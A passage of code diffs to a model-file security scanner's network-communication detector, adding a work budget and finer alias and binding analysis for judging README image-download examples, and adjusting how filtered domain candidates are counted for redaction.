                     ast.Dict,
                 )
-                if requires_proof and not remote_code_mapping_is_proven_safe_at_call(keyword.value, node):
+                if requires_proof and not remote_code_mapping_is_proven_safe_at_call(
+                    keyword.value,
+                    node,
+                    proven_mapping_call_ids=proven_mapping_call_ids,
+                    proven_mapping_binding_chains=proven_mapping_binding_chains,
+                    proven_mapping_transfer_call_ids=proven_mapping_transfer_call_ids,
+                ):
                     return False
             attribute_root = node.func.value
             while isinstance(attribute_root, (ast.Attribute, ast.Subscript, ast.Call)):

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -3466,12 +3466,104 @@ def _is_valid_official_readme_sample_image_example(
             return None
         return (*prior_chain, id(binding_node))
 
+    def conditional_mapping_test_is_proven_inert(test: ast.expr, binding_node: ast.AST) -> bool:
+        if isinstance(test, ast.Constant):
+            return isinstance(test.value, bool)
+        if (
+            not isinstance(test, ast.Compare)
+            or len(test.ops) != 1
+            or not isinstance(test.ops[0], (ast.Eq, ast.NotEq))
+            or len(test.comparators) != 1
+        ):
+            return False
+        left, right = test.left, test.comparators[0]
+        if isinstance(left, ast.Constant):
+            left, right = right, left
+        if (
+            not isinstance(left, ast.Attribute)
+            or left.attr != "mode"
+            or not isinstance(left.value, ast.Name)
+            or not isinstance(right, ast.Constant)
+            or not isinstance(right.value, str)
+        ):
+            return False
+        image_name = left.value.id
+        image_bindings = [
+            (image_binding, image_value)
+            for image_binding, image_value in single_name_bindings.get(image_name, [])
+            if operation_may_affect_reference(image_binding, binding_node)
+        ]
+        relevant_write_count = sum(
+            operation_may_affect_reference(write_node, binding_node)
+            for write_node in name_write_nodes.get(image_name, [])
+        )
+        if len(image_bindings) != 1 or relevant_write_count != 1:
+            return False
+        image_binding, image_value = image_bindings[0]
+        return (
+            binding_position_at_reference(image_binding, binding_node) < top_level_statement_indices[id(binding_node)]
+            and is_single_name_binding(image_binding, image_value, image_name)
+            and isinstance(image_value, ast.Call)
+            and isinstance(image_value.func, ast.Attribute)
+            and image_value.func.attr == "open"
+            and isinstance(image_value.func.value, ast.Name)
+            and image_value.func.value.id == "Image"
+        )
+
+    def proven_conditional_mapping_factory_calls(
+        binding_node: ast.AST,
+        mapping_value: ast.IfExp,
+    ) -> tuple[frozenset[int], frozenset[int]] | None:
+        pending: list[ast.expr] = [mapping_value]
+        mapping_call_ids: set[int] = set()
+        transfer_call_ids: set[int] = set()
+        mapping_factory_name: str | None = None
+        remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+        while pending:
+            if remaining_steps <= 0 or not proof_budget.consume(1):
+                return None
+            remaining_steps -= 1
+            current = pending.pop()
+            if isinstance(current, ast.IfExp):
+                if not conditional_mapping_test_is_proven_inert(current.test, binding_node):
+                    return None
+                pending.extend((current.body, current.orelse))
+                continue
+            unwrapped_mapping = unwrap_safe_local_device_transfers(current, binding_node)
+            if unwrapped_mapping is None:
+                return None
+            factory_call, transfer_calls = unwrapped_mapping
+            if (
+                not isinstance(factory_call, ast.Call)
+                or not isinstance(factory_call.func, ast.Name)
+                or not trusted_mapping_factory_call_is_proven_safe(binding_node, factory_call)
+            ):
+                return None
+            if mapping_factory_name is None:
+                mapping_factory_name = factory_call.func.id
+            elif mapping_factory_name != factory_call.func.id:
+                return None
+            mapping_call_ids.add(id(current))
+            transfer_call_ids.update(id(transfer_call) for transfer_call in transfer_calls)
+        return frozenset(mapping_call_ids), frozenset(transfer_call_ids)
+
     for binding_node, binding_name, binding_value in ordered_mapping_bindings:
-        if not isinstance(binding_value, ast.Call) or not is_single_name_binding(
+        if not is_single_name_binding(
             binding_node,
             binding_value,
             binding_name,
         ):
+            continue
+        if isinstance(binding_value, ast.IfExp):
+            conditional_mapping_calls = proven_conditional_mapping_factory_calls(binding_node, binding_value)
+            if conditional_mapping_calls is None:
+                continue
+            mapping_call_ids, transfer_call_ids = conditional_mapping_calls
+            proven_mapping_binding_chains[id(binding_node)] = (id(binding_node),)
+            proven_mapping_call_id_set.update(mapping_call_ids)
+            proven_mapping_transfer_call_id_set.update(transfer_call_ids)
+            continue
+        if not isinstance(binding_value, ast.Call):
             continue
         unwrapped_mapping = unwrap_safe_local_device_transfers(binding_value, binding_node)
         if unwrapped_mapping is None:
@@ -3584,6 +3676,24 @@ def _is_valid_official_readme_sample_image_example(
     benign_callable_marker = "<benign-callable>"
     untrusted_callable_marker = "<untrusted-callable>"
     named_callable_resolution_cache: dict[tuple[str, int], frozenset[str] | None] = {}
+    named_callable_write_events: dict[str, tuple[tuple[ast.AST, ast.expr | None], ...]] = {}
+    for candidate_name in name_value_bindings.keys() | name_write_nodes.keys():
+        write_events: list[tuple[ast.AST, ast.expr | None]] = [
+            *name_value_bindings.get(candidate_name, []),
+            *(
+                (write_node, None)
+                for write_node in name_write_nodes.get(candidate_name, [])
+                if id(write_node) not in modeled_name_write_ids.get(candidate_name, set())
+            ),
+        ]
+        write_events.sort(
+            key=lambda item: (
+                top_level_statement_indices.get(id(item[0]), len(tree.body)),
+                getattr(item[0], "lineno", 0),
+                getattr(item[0], "col_offset", 0),
+            )
+        )
+        named_callable_write_events[candidate_name] = tuple(write_events)
 
     def binding_is_proven_after_eager_reference(binding: ast.AST, reference: ast.AST) -> bool:
         if execution_may_be_deferred(reference):
@@ -3630,6 +3740,8 @@ def _is_valid_official_readme_sample_image_example(
             value: ast.expr,
             reference: ast.AST,
         ) -> frozenset[str] | None:
+            if not proof_budget.consume_named_callable(1):
+                return None
             if isinstance(value, ast.Attribute) and value.attr in sensitive_callable_attributes:
                 return frozenset({value.attr})
             if isinstance(value, ast.Name):
@@ -3669,23 +3781,15 @@ def _is_valid_official_readme_sample_image_example(
                 return memo[key]
             if key in resolving:
                 return None
+            write_events = named_callable_write_events.get(candidate_name, ())
+            # Each write can require call-relative lexical and execution-order checks.
+            # Charge the full history shape before expanding it so many compact
+            # histories cannot consume unbounded CPU below the scan-wide ceiling.
+            history_work = len(nodes) * max(1, len(write_events))
+            if not proof_budget.consume_named_callable(history_work):
+                return None
             resolving.add(key)
             resolution: frozenset[str] | None = None
-            write_events: list[tuple[ast.AST, ast.expr | None]] = [
-                *name_value_bindings.get(candidate_name, []),
-                *(
-                    (write_node, None)
-                    for write_node in name_write_nodes.get(candidate_name, [])
-                    if id(write_node) not in modeled_name_write_ids.get(candidate_name, set())
-                ),
-            ]
-            write_events.sort(
-                key=lambda item: (
-                    top_level_statement_indices.get(id(item[0]), len(tree.body)),
-                    getattr(item[0], "lineno", 0),
-                    getattr(item[0], "col_offset", 0),
-                )
-            )
             for binding_node, binding_value in write_events:
                 if binding_is_proven_after_eager_reference(
                     binding_node,
@@ -4349,6 +4453,7 @@ class NetworkCommDetector:
         self._url_context_scan_complete = False
         self._evidence_redaction_classifications = 0
         self._evidence_redaction_limit_reached = False
+        self._has_sensitive_evidence_hint = False
         self._cloud_nested_url_findings: set[str] = set()
         self._official_readme_image_fences: list[tuple[int, int, bool]] = []
         self._official_readme_image_unvalidated_requests = False
@@ -4382,6 +4487,7 @@ class NetworkCommDetector:
         self.truncated_finding = None
         self._evidence_redaction_classifications = 0
         self._evidence_redaction_limit_reached = False
+        self._has_sensitive_evidence_hint = _SENSITIVE_EVIDENCE_HINT_PATTERN.search(data) is not None
         self._cloud_nested_url_findings = set()
         (
             self._official_readme_image_fences,
@@ -4496,7 +4602,8 @@ class NetworkCommDetector:
             url = _trim_matched_source_url(data, match)
             yield match.start(), match.start() + len(url.encode("utf-8")), url
 
-    def _is_redacted_url_value(self, data: bytes, match_start: int, value: str) -> bool:
+    def _url_context_redaction_decision(self, data: bytes, match_start: int, value: str) -> bool | None:
+        """Return a bounded URL-context decision or None when evidence analysis is still needed."""
         if self.max_findings is not None:
             local_uri_context = _url_text_bounds_containing_offset(data, match_start)
             if local_uri_context is None:
@@ -4512,18 +4619,22 @@ class NetworkCommDetector:
                     url_start, _url_end, url = lazy_url_context
                     if _is_match_redacted_from_url_context(url, url_start, match_start, value):
                         return True
-            return _is_split_sensitive_url_value(data, match_start) or self._is_redacted_evidence_value(
-                data, match_start, value
-            )
+            return None
         context_index = bisect_right(self._url_context_starts, match_start) - 1
         if context_index >= 0:
             url_start, url_end, url = self._url_contexts[context_index]
             if match_start < url_end:
                 return _is_match_redacted_from_url_context(url, url_start, match_start, value)
-        return (
-            _is_match_redacted_from_url(data, match_start, value)
-            or _is_split_sensitive_url_value(data, match_start)
-            or self._is_redacted_evidence_value(data, match_start, value)
+        if _is_match_redacted_from_url(data, match_start, value):
+            return True
+        return None
+
+    def _is_redacted_url_value(self, data: bytes, match_start: int, value: str) -> bool:
+        url_decision = self._url_context_redaction_decision(data, match_start, value)
+        if url_decision is not None:
+            return url_decision
+        return _is_split_sensitive_url_value(data, match_start) or self._is_redacted_evidence_value(
+            data, match_start, value
         )
 
     def _is_redacted_evidence_value(self, data: bytes, match_start: int, value: str) -> bool:
@@ -4541,6 +4652,16 @@ class NetworkCommDetector:
             return True
         self._evidence_redaction_classifications += 1
         return _is_redacted_evidence_value(data, match_start, value)
+
+    def _account_filtered_domain_redaction(self, data: bytes, match_start: int, value: str) -> None:
+        """Preserve bounded evidence accounting for domain candidates filtered before reporting."""
+        if not self._has_sensitive_evidence_hint or self._evidence_redaction_limit_reached:
+            return
+        if self._url_context_redaction_decision(data, match_start, value) is not None:
+            return
+        if _is_split_sensitive_url_value(data, match_start):
+            return
+        self._is_redacted_evidence_value(data, match_start, value)
 
     def _lazy_url_context_containing(self, match_start: int) -> tuple[int, int, str] | None:
         """Advance the bounded lazy URL index only far enough to classify one match."""
@@ -4906,29 +5027,33 @@ class NetworkCommDetector:
             # Skip common false positives
             if domain in seen_domains:
                 continue
-            if self._is_redacted_url_value(data, match.start(), domain):
-                continue
             if domain.endswith((".pkl", ".pt", ".h5", ".pb", ".onnx", ".json")):
+                self._account_filtered_domain_redaction(data, match.start(), domain)
                 continue  # File extensions
             if domain in ["numpy.org", "pytorch.org", "tensorflow.org"]:
+                self._account_filtered_domain_redaction(data, match.start(), domain)
                 continue  # ML framework domains
 
             # Skip actual layer-name grammar (e.g., layer1.weight), not any
             # attacker-controlled DNS name that happens to contain ML words.
             if _ML_LAYER_DOMAIN_PATTERN.fullmatch(domain):
+                self._account_filtered_domain_redaction(data, match.start(), domain)
                 continue
             # Bare method calls such as weight.to(device) are code tokens, not DNS names.
             if _has_call_syntax(data, match.start(), len(match.group())):
+                self._account_filtered_domain_redaction(data, match.start(), domain)
                 continue
 
             # Skip very short domain names in binary files (likely false positives)
             # e.g., "8.to", "9.cc" are probably random bytes, not real domains
             domain_parts = domain.split(".")
             if len(domain_parts) < 2:
+                self._account_filtered_domain_redaction(data, match.start(), domain)
                 continue
 
             # Skip single character subdomains with short TLDs (common false positive in binary data)
             if len(domain_parts) == 2 and len(domain_parts[0]) <= 2 and len(domain_parts[1]) <= 2:
+                self._account_filtered_domain_redaction(data, match.start(), domain)
                 continue  # Skip patterns like "8.to", "h8.cc", etc.
             tld = domain_parts[-1]
             # Common TLDs (not exhaustive, but covers most)
@@ -4971,6 +5096,9 @@ class NetworkCommDetector:
                 "xyz",
             ]
             if tld not in valid_tlds:
+                self._account_filtered_domain_redaction(data, match.start(), domain)
+                continue
+            if self._is_redacted_url_value(data, match.start(), domain):
                 continue
 
             seen_domains.add(domain)

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1733,12 +1733,29 @@ _MAX_README_IMAGE_EXAMPLE_BYTES = 64 * 1024
 _MAX_README_IMAGE_EXAMPLE_AST_NODES = 1024
 _MAX_README_IMAGE_EXAMPLE_FENCE_OPENINGS = 64
 _MAX_README_IMAGE_EXAMPLE_FENCES = 256
+_MAX_README_IMAGE_EXAMPLE_MAPPING_PROOF_WORK = 64 * _MAX_README_IMAGE_EXAMPLE_AST_NODES
 _PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}(?P<fence>`{3,}|~{3,})(?:python|py)[ \t]*\r?\n")
 _README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}(?:`{3,}|~{3,})[ \t]*\r?$")
 _QUALIFIED_REQUESTS_CALL_PATTERN = re.compile(rb"\brequests\s*\.\s*[A-Za-z_][A-Za-z_0-9]*\s*\(")
 _DOCUMENTED_IMAGE_SUFFIXES = (".png", ".jpg", ".jpeg", ".webp", ".gif", ".bmp")
 _WORD_PATTERN = re.compile(rb"[A-Za-z]{2,}")
 _CALL_SYNTAX_SUFFIX_PATTERN = re.compile(rb"(?:[\s)]|#[^\n]*\n)*\(")
+
+
+class _ReadmeImageExampleProofBudget:
+    def __init__(self) -> None:
+        self.remaining = _MAX_README_IMAGE_EXAMPLE_MAPPING_PROOF_WORK
+        self.exceeded = False
+
+    def consume(self, work: int) -> bool:
+        if self.exceeded or work > self.remaining:
+            self.remaining = 0
+            self.exceeded = True
+            return False
+        self.remaining -= work
+        return True
+
+
 _CODE_LINE_PREFIXES: tuple[bytes, ...] = (
     b"import ",
     b"from ",
@@ -1942,6 +1959,7 @@ def _index_official_readme_sample_image_fences(
 
     fences: list[tuple[int, int, bool]] = []
     unvalidated_requests = False
+    proof_budget = _ReadmeImageExampleProofBudget()
     cursor = 0
     while opening := _PYTHON_README_FENCE_PATTERN.search(data, cursor):
         if len(fences) >= _MAX_README_IMAGE_EXAMPLE_FENCES:
@@ -1960,7 +1978,7 @@ def _index_official_readme_sample_image_fences(
         is_safe = (
             b"import requests" in example
             and b"requests.get" in example
-            and _is_valid_official_readme_sample_image_example(example)
+            and _is_valid_official_readme_sample_image_example(example, proof_budget=proof_budget)
         )
         if not is_safe and _contains_executable_requests_reference(example):
             unvalidated_requests = True
@@ -2128,7 +2146,15 @@ def _remote_code_mapping_is_proven_safe(
         return False
 
 
-def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
+def _is_valid_official_readme_sample_image_example(
+    example: bytes,
+    *,
+    proof_budget: _ReadmeImageExampleProofBudget | None = None,
+) -> bool:
+    if proof_budget is None:
+        proof_budget = _ReadmeImageExampleProofBudget()
+    elif proof_budget.exceeded:
+        return False
     if b"import requests" not in example or b"requests.get" not in example:
         return False
     try:
@@ -2765,6 +2791,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         proven_mapping_binding_chains: dict[int, tuple[int, ...]] | None = None,
         proven_mapping_transfer_call_ids: frozenset[int] = frozenset(),
     ) -> bool:
+        if not proof_budget.consume(len(nodes)):
+            return False
         binding_chains = proven_mapping_binding_chains or {}
         relevant_binding_nodes = {
             name: [
@@ -3535,7 +3563,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             or not parsed.path.lower().endswith(_DOCUMENTED_IMAGE_SUFFIXES)
         ):
             return False
-    return True
+    return not proof_budget.exceeded
 
 
 class NetworkCommDetector:

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2306,6 +2306,13 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if not isinstance(binding_node, (ast.Assign, ast.AnnAssign)):
             continue
         targets = binding_node.targets if isinstance(binding_node, ast.Assign) else [binding_node.target]
+        if (
+            not isinstance(parents.get(id(binding_node)), ast.Module)
+            and isinstance(binding_node.value, ast.Call)
+            and len(targets) == 1
+            and isinstance(targets[0], ast.Name)
+        ):
+            mapping_bindings.setdefault(targets[0].id, []).append((binding_node, binding_node.value))
         identity_names = [target.id for target in targets if isinstance(target, ast.Name)]
         if isinstance(binding_node.value, ast.Name):
             identity_names.append(binding_node.value.id)
@@ -2315,11 +2322,21 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                 if alias_name == root_name:
                     continue
                 mapping_aliases.append((binding_node, root_name, alias_name))
+    for candidates in mapping_bindings.values():
+        candidates.sort(key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)))
 
     top_level_statement_indices = {
         id(descendant): statement_index
         for statement_index, statement in enumerate(tree.body)
         for descendant in ast.walk(statement)
+    }
+    statement_memberships = {
+        id(statement): (parent, field_name, statement_index, statement)
+        for parent in nodes
+        for field_name, field_value in ast.iter_fields(parent)
+        if isinstance(field_value, list)
+        for statement_index, statement in enumerate(field_value)
+        if isinstance(statement, ast.stmt)
     }
 
     def top_level_statement_precedes(candidate: ast.AST, reference: ast.AST) -> bool:
@@ -2362,6 +2379,76 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                 return True
             current = parent
         return False
+
+    def direct_statement_membership(node: ast.AST) -> tuple[ast.AST, str, int, ast.stmt] | None:
+        current = node
+        while parent := parents.get(id(current)):
+            membership = statement_memberships.get(id(current))
+            if membership is not None:
+                return membership
+            current = parent
+        return None
+
+    def is_canonical_no_grad_with(node: ast.With) -> bool:
+        if len(node.items) != 1 or node.items[0].optional_vars is not None:
+            return False
+        context = node.items[0].context_expr
+        return (
+            isinstance(context, ast.Call)
+            and not context.args
+            and not context.keywords
+            and isinstance(context.func, ast.Attribute)
+            and context.func.attr == "no_grad"
+            and isinstance(context.func.value, ast.Name)
+            and context.func.value.id == "torch"
+        )
+
+    def is_single_execution_body(container: ast.AST, field_name: str) -> bool:
+        if isinstance(container, ast.If):
+            return field_name in {"body", "orelse"}
+        return isinstance(container, ast.With) and field_name == "body" and is_canonical_no_grad_with(container)
+
+    def nested_mapping_binding_precedes_call(binding: ast.AST, call: ast.Call) -> bool:
+        if call_execution_may_be_deferred(call):
+            return False
+        binding_membership = direct_statement_membership(binding)
+        call_membership = direct_statement_membership(call)
+        if binding_membership is None or call_membership is None:
+            return False
+        binding_container, binding_field, binding_index, binding_statement = binding_membership
+        call_container, call_field, call_index, call_statement = call_membership
+        if (
+            binding_container is not call_container
+            or binding_field != call_field
+            or binding_statement is not binding
+            or not isinstance(call_statement, ast.Expr)
+            or call_statement.value is not call
+            or binding_index >= call_index
+            or not is_single_execution_body(binding_container, binding_field)
+        ):
+            return False
+
+        container = binding_container
+        while not isinstance(container, ast.Module):
+            container_membership = direct_statement_membership(container)
+            if container_membership is None:
+                return False
+            parent, field_name, _statement_index, statement = container_membership
+            if statement is not container:
+                return False
+            if isinstance(parent, ast.Module):
+                return True
+            if not is_single_execution_body(parent, field_name):
+                return False
+            container = parent
+        return True
+
+    def mapping_binding_position_at_call(binding: ast.AST, call: ast.Call) -> int:
+        binding_position = top_level_statement_indices[id(binding)]
+        call_position = top_level_statement_indices[id(call)]
+        if not isinstance(parents.get(id(binding)), ast.Module):
+            return call_position - 1 if nested_mapping_binding_precedes_call(binding, call) else call_position
+        return binding_position
 
     def mapping_operation_may_affect_call(operation: ast.AST, call: ast.Call) -> bool:
         if call_execution_may_be_deferred(call):
@@ -2459,7 +2546,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                     logical_candidates = [candidates[-1]]
                     logical_write_count = 1
             relevant_bindings[name] = [
-                (top_level_statement_indices[id(binding_node)], binding_value)
+                (mapping_binding_position_at_call(binding_node, call), binding_value)
                 for binding_node, binding_value in logical_candidates
             ]
             relevant_binding_counts[name] = logical_write_count
@@ -2516,6 +2603,10 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             if isinstance(binding_node, ast.Call):
                 if call_execution_may_be_deferred(binding_node):
                     return True
+                operation_index = top_level_statement_indices.get(id(operation))
+                reference_index = top_level_statement_indices.get(id(binding_node))
+                return operation_index is None or reference_index is None or operation_index <= reference_index
+            if not isinstance(parents.get(id(binding_node)), ast.Module):
                 operation_index = top_level_statement_indices.get(id(operation))
                 reference_index = top_level_statement_indices.get(id(binding_node))
                 return operation_index is None or reference_index is None or operation_index <= reference_index
@@ -2623,7 +2714,11 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             for binding_name, candidates in mapping_bindings.items()
             for binding_node, binding_value in candidates
         ),
-        key=lambda item: top_level_statement_indices.get(id(item[0]), len(tree.body)),
+        key=lambda item: (
+            top_level_statement_indices.get(id(item[0]), len(tree.body)),
+            getattr(item[0], "lineno", 0),
+            getattr(item[0], "col_offset", 0),
+        ),
     )
     for binding_node, binding_name, binding_value in ordered_mapping_bindings:
         if not isinstance(binding_value, ast.Call) or not is_single_name_binding(

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2279,6 +2279,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     mapping_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
     single_name_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
     mapping_aliases: list[tuple[ast.AST, str, str]] = []
+    mapping_alias_groups: list[tuple[ast.AST, tuple[str, ...], str]] = []
+    mapping_alias_target_names: set[str] = set()
     name_write_nodes: dict[str, list[ast.AST]] = {}
     for node in nodes:
         if isinstance(node, ast.Name) and isinstance(node.ctx, (ast.Store, ast.Del)):
@@ -2316,16 +2318,13 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             and isinstance(targets[0], ast.Name)
         ):
             mapping_bindings.setdefault(targets[0].id, []).append((binding_node, binding_node.value))
-        identity_names = [target.id for target in targets if isinstance(target, ast.Name)]
-        if isinstance(binding_node.value, ast.Name):
-            identity_names.append(binding_node.value.id)
-        if identity_names:
-            root_name = identity_names[0]
-            for alias_name in identity_names[1:]:
-                if alias_name == root_name:
-                    continue
-                mapping_aliases.append((binding_node, root_name, alias_name))
+        target_names = [target.id for target in targets if isinstance(target, ast.Name)]
+        if target_names and isinstance(binding_node.value, ast.Name):
+            mapping_alias_target_names.update(target_names)
+            mapping_alias_groups.append((binding_node, tuple(dict.fromkeys(target_names)), binding_node.value.id))
     for candidates in mapping_bindings.values():
+        candidates.sort(key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)))
+    for candidates in single_name_bindings.values():
         candidates.sort(key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)))
 
     top_level_statement_indices = {
@@ -2471,8 +2470,155 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         reference_index = top_level_statement_indices.get(id(reference))
         return operation_index is None or reference_index is None or operation_index <= reference_index
 
+    def operation_definitely_follows_reference(operation: ast.AST, reference: ast.AST) -> bool:
+        if execution_may_be_deferred(reference):
+            return False
+        operation_line = getattr(operation, "lineno", None)
+        reference_line = getattr(reference, "lineno", None)
+        if operation_line is not None and operation_line == reference_line:
+            return False
+        operation_index = top_level_statement_indices.get(id(operation))
+        reference_index = top_level_statement_indices.get(id(reference))
+        if operation_index is None or reference_index is None:
+            return False
+        if operation_index != reference_index:
+            return operation_index > reference_index
+        operation_membership = direct_statement_membership(operation)
+        reference_membership = direct_statement_membership(reference)
+        if operation_membership is None or reference_membership is None:
+            return False
+        operation_statement = operation_membership[3]
+        reference_statement = reference_membership[3]
+        return binding_precedes_reference_in_supported_body(reference_statement, operation_statement)
+
+    def is_direct_expression_call(call: ast.Call) -> bool:
+        call_membership = direct_statement_membership(call)
+        return (
+            call_membership is not None
+            and isinstance(call_membership[3], ast.Expr)
+            and call_membership[3].value is call
+        )
+
     def mapping_operation_may_affect_call(operation: ast.AST, call: ast.Call) -> bool:
+        if is_direct_expression_call(call) and operation_definitely_follows_reference(operation, call):
+            return False
         return operation_may_affect_reference(operation, call)
+
+    def node_is_within(node: ast.AST, ancestor: ast.AST) -> bool:
+        current: ast.AST | None = node
+        while current is not None:
+            if current is ancestor:
+                return True
+            current = parents.get(id(current))
+        return False
+
+    mapping_alias_targets = {
+        id(binding_node): frozenset(target_names) for binding_node, target_names, _source_name in mapping_alias_groups
+    }
+
+    def alias_state_after_edge(
+        binding_node: ast.AST,
+        first_name: str,
+        second_name: str,
+        current_name: str,
+        reference: ast.AST,
+        version_binding: ast.AST | None,
+    ) -> tuple[str, ast.AST, ast.AST | None] | None:
+        alias_name = second_name if current_name == first_name else first_name
+        target_names = mapping_alias_targets.get(id(binding_node), frozenset())
+        if binding_node is reference:
+            return (
+                alias_name,
+                reference,
+                binding_node if alias_name in target_names else None,
+            )
+        if operation_definitely_follows_reference(binding_node, reference):
+            binding_value = binding_node.value if isinstance(binding_node, (ast.Assign, ast.AnnAssign)) else None
+            if not isinstance(binding_value, ast.Name) or binding_value.id != current_name:
+                return None
+            for write_node in name_write_nodes.get(current_name, []):
+                if node_is_within(write_node, reference) or node_is_within(write_node, binding_node):
+                    continue
+                if operation_definitely_follows_reference(
+                    write_node,
+                    reference,
+                ) and operation_definitely_follows_reference(binding_node, write_node):
+                    return None
+            return (
+                alias_name,
+                binding_node,
+                binding_node if alias_name in target_names else None,
+            )
+        reference_is_post_binding = version_binding is reference
+        for endpoint_name in (first_name, second_name):
+            for write_node in name_write_nodes.get(endpoint_name, []):
+                if node_is_within(write_node, binding_node):
+                    continue
+                if reference_is_post_binding and node_is_within(write_node, reference):
+                    return None
+                if operation_definitely_follows_reference(
+                    write_node,
+                    binding_node,
+                ) and operation_definitely_follows_reference(reference, write_node):
+                    return None
+        return (
+            alias_name,
+            reference,
+            binding_node if alias_name in target_names else None,
+        )
+
+    def alias_edge_survives_until_reference(
+        binding_node: ast.AST,
+        first_name: str,
+        second_name: str,
+        reference: ast.AST,
+    ) -> bool:
+        if not operation_definitely_follows_reference(reference, binding_node):
+            return False
+        for endpoint_name in (first_name, second_name):
+            for write_node in name_write_nodes.get(endpoint_name, []):
+                if node_is_within(write_node, binding_node):
+                    continue
+                if operation_definitely_follows_reference(
+                    write_node,
+                    binding_node,
+                ) and operation_definitely_follows_reference(reference, write_node):
+                    return False
+        return True
+
+    expanded_mapping_aliases: list[tuple[ast.AST, str, str]] = []
+    remaining_alias_expansion_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+    for binding_node, group_target_names, source_name in sorted(
+        mapping_alias_groups,
+        key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)),
+    ):
+        source_component = {source_name}
+        pending_source_names = [source_name]
+        while pending_source_names:
+            current_name = pending_source_names.pop()
+            for prior_binding, first_name, second_name in expanded_mapping_aliases:
+                if remaining_alias_expansion_steps <= 0:
+                    return False
+                remaining_alias_expansion_steps -= 1
+                if current_name not in {first_name, second_name} or not alias_edge_survives_until_reference(
+                    prior_binding,
+                    first_name,
+                    second_name,
+                    binding_node,
+                ):
+                    continue
+                alias_name = second_name if current_name == first_name else first_name
+                if alias_name in source_component:
+                    continue
+                source_component.add(alias_name)
+                pending_source_names.append(alias_name)
+        identity_names = list(dict.fromkeys((*group_target_names, *sorted(source_component))))
+        for first_index, first_name in enumerate(identity_names):
+            for second_name in identity_names[first_index + 1 :]:
+                if len(expanded_mapping_aliases) >= _MAX_README_IMAGE_EXAMPLE_AST_NODES:
+                    return False
+                expanded_mapping_aliases.append((binding_node, first_name, second_name))
+    mapping_aliases = expanded_mapping_aliases
 
     aliased_mapping_names = set(mapping_bindings)
     for _binding_node, first_name, second_name in mapping_aliases:
@@ -2567,25 +2713,48 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             relevant_binding_counts[name] = logical_write_count
         for name, write_nodes in relevant_name_writes.items():
             relevant_binding_counts.setdefault(name, len(write_nodes))
-        relevant_aliases: dict[str, set[str]] = {}
-        for binding_node, first_name, second_name in mapping_aliases:
-            if not mapping_operation_may_affect_call(binding_node, call):
+        unsafe_names: set[str] = set()
+        remaining_alias_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+        for name, operation in unsafe_mapping_operations_for(proven_mapping_transfer_call_ids):
+            if not mapping_operation_may_affect_call(operation, call):
                 continue
-            relevant_aliases.setdefault(first_name, set()).add(second_name)
-            relevant_aliases.setdefault(second_name, set()).add(first_name)
-        unsafe_names = {
-            name
-            for name, operation in unsafe_mapping_operations_for(proven_mapping_transfer_call_ids)
-            if mapping_operation_may_affect_call(operation, call)
-        }
-        pending_unsafe_names = list(unsafe_names)
-        while pending_unsafe_names:
-            unsafe_name = pending_unsafe_names.pop()
-            for alias_name in relevant_aliases.get(unsafe_name, set()):
-                if alias_name in unsafe_names:
-                    continue
-                unsafe_names.add(alias_name)
-                pending_unsafe_names.append(alias_name)
+            operation_unsafe_names = {name}
+            initial_state: tuple[str, ast.AST, ast.AST | None] = (name, operation, None)
+            seen_alias_states: set[tuple[str, int, int | None]] = {(name, id(operation), None)}
+            pending_alias_states: list[tuple[str, ast.AST, ast.AST | None]] = [initial_state]
+            while pending_alias_states:
+                unsafe_name, reference, version_binding = pending_alias_states.pop()
+                for binding_node, first_name, second_name in mapping_aliases:
+                    if remaining_alias_steps <= 0:
+                        return False
+                    remaining_alias_steps -= 1
+                    if not mapping_operation_may_affect_call(binding_node, call) or unsafe_name not in {
+                        first_name,
+                        second_name,
+                    }:
+                        continue
+                    alias_state = alias_state_after_edge(
+                        binding_node,
+                        first_name,
+                        second_name,
+                        unsafe_name,
+                        reference,
+                        version_binding,
+                    )
+                    if alias_state is None:
+                        continue
+                    alias_name, alias_reference, alias_version_binding = alias_state
+                    operation_unsafe_names.add(alias_name)
+                    state_key = (
+                        alias_name,
+                        id(alias_reference),
+                        id(alias_version_binding) if alias_version_binding is not None else None,
+                    )
+                    if state_key in seen_alias_states:
+                        continue
+                    seen_alias_states.add(state_key)
+                    pending_alias_states.append(alias_state)
+            unsafe_names.update(operation_unsafe_names)
 
         return _remote_code_mapping_is_proven_safe(
             value,
@@ -2804,12 +2973,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         mapping_value, transfer_calls = unwrapped_mapping
         if not transfer_calls or not isinstance(mapping_value, ast.Name):
             continue
-        prior_bindings = [
-            prior_binding
-            for prior_binding, _prior_value in mapping_bindings.get(mapping_value.id, [])
-            if top_level_statement_precedes(prior_binding, transfer_call)
-        ]
